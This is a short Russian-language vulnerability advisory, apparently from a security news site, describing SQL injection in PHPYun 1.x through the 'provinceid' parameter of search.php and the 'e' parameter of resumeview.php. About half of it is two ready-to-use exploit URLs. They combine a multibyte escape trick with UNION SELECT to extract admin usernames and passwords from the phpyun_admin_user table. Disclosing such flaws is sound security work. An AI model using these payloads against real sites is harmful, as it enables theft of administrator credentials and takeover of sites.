Программа: PHPYun 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL
команды в базе данных приложения. Уязвимость существует из-за недостаточной
обработки входных данных в параметре "provinceid" сценарием search.php (когда "cityid"
установлен) и в параметре "e" parameter to resumeview.php (when "uid" is set).
Удаленный пользователь может с помощью специально сформированного запроса
выполнить произвольные SQL команды в базе данных приложения.

Эксплоит:

www.abc.com/search.php?keyword=&provinceid=%df\&cityid=%20union%20select%201,2,
concat(0x40,0x23,username,0x7e,password,0x23,0x40),4,5,6,7,8,9,0,11,12%20
from%20phpyun_admin_user—%20-&mySearchCityName= &mySearchCity=&search=%CB%D1%CB%F7

www.abc.com/resumeview.php?uid= union select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(0x40,0x23,username,0x7e,password,0x23,0x40),17
from phpyun_admin_user— sd&e=%df\

Оставить мнение